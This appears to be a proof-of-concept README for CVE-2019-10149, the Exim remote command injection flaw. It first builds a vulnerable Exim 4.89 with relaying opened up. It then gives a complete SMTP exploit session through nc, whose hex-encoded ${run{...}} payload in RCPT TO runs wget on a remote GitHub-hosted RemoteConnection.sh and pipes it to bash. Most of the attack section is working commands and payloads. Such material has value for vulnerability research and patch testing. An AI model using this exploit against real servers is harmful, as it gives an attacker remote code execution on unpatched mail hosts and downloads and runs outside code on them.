CVE-2019-10149 PoC — Exim 操作系统命令注入漏洞

Description

CVE-2019-10149

介绍

# CVE-2019-10149 - Exim 4.87 < 4.91
Instructions for installing a vulnerable version of Exim and its expluatation
Tested on Linux Ubuntu 16.04, Exim 4.89

## Exim installation
Download and extract exim version 4.89
 * wget https://github.com/Exim/exim/releases/download/exim-4_89/exim-4.89.tar.xz && tar -xvf exim-4.89.tar.xz

Move into the extracted folder
 * cd exim-4.89/

Copy and modify required config files
 * sed -e 's,^EXIM_USER. * $,EXIM_USER=exim,' Local/Makefile src/EDITME > Local/Makefile

 * cp exim_monitor/EDITME Local/eximon.conf

Create exim user and group
 * sudo groupadd -g 31 exim 

 * sudo useradd -d /dev/null -c "Exim Daemon" -g exim -s /bin/false -u 31 exim

Install dependencies
 * sudo apt-get update
 * sudo apt-get install -y make build-essential libpcre3-dev libdb-dev libxt-dev libxaw7-dev

Install exim 4.89
 * sudo make install

Edit /usr/exim/configure to allow relaying so we can exploit without waiting 7 days
 * sudo sed -iz 's/domainlist relay_to_domains =/domainlist relay_to_domains =  * /' /usr/exim/configure
 * sudo sed -i '/hostlist   relay_from_hosts = localhost/c\hostlist   relay_from_hosts = 0.0.0.0' /usr/exim/configure
 * sudo sed -i '/require verify = recipient/c\#require verify = recipient' /usr/exim/configure

Run exim as user exim
 * sudo -H -u exim /usr/exim/bin/exim -bd -d-receive    
	
## Crafting the exploit
Convert your shell command to hex. Example:
 * /bin/sh -c “wget https://raw.githubusercontent.com/hyim0810/CVE-2019-10149/main/RemoteConnection.sh" -O - | bash
* \x2Fbin\x2Fsh\t-c\t\x22wget\t\https\x3A\x2F\x2Fraw\x2Egithubusercontent\x2Ecom\x2Fhyim0810\x2FCVE\x2D2019\x2D10149\x2Fmain\x2FRemoteConnection\x2Esh\t-O\t-\t\x7C\tbash\x22\
	
	
Table for example:
 * \t-c\ = -c
 * \t\= space
 * x20 = space
 * x7C = |
 * x2F = /
 * x3A = :
 * x2D = -
 * x3E = >
 * x26 = &
 * x22 = "
 * x2E = .
	
## Exploit usage
First we use nc to start a connection to the server.
 * nc 192.168.0.168 25
 
Once we are connected we say HELO.
 * helo localhost
 * (Answer: 250 exim Hello localhost [192.168.0.168])

Next, we set the sender address to blank.
 * mail from:<>
 * (Answer: 250 OK)

Then we set out recipient address with the payload we made earlier by inserting our desired command where the ellipses is rcpt to:<${run{...}}@localhost>.
 * rcpt to:<${run{\x2Fbin\x2Fsh\t-c\t\x22wget\t\https\x3A\x2F\x2Fraw\x2Egithubusercontent\x2Ecom\x2Fdarsigovrustam\x2FCVE\x2D2019\x2D10149\x2Fmaster\x2FRemoteConnection\x2Esh\t-O\t-\t\x7C\tbash\x22\}}@localhost>
 * (Answer: 250 Accepted)

And finally We first type DATA, followed by 31 lines, a blank line, and a period.
 * DATA
 * Received: 1
 * Received: 2
 * Received: 3
 * Received: 4
 * Received: 5
 * Received: 6
 * Received: 7
 * Received: 8
 * Received: 9
 * Received: 10
 * Received: 11
 * Received: 12
 * Received: 13
 * Received: 14
 * Received: 15
 * Received: 16
 * Received: 17
 * Received: 18
 * Received: 19
 * Received: 20
 * Received: 21
 * Received: 22
 * Received: 23
 * Received: 24
 * Received: 25
 * Received: 26
 * Received: 27
 * Received: 28
 * Received: 29
 * Received: 30
 * Received: 31
 * 
 * .

文件快照

备注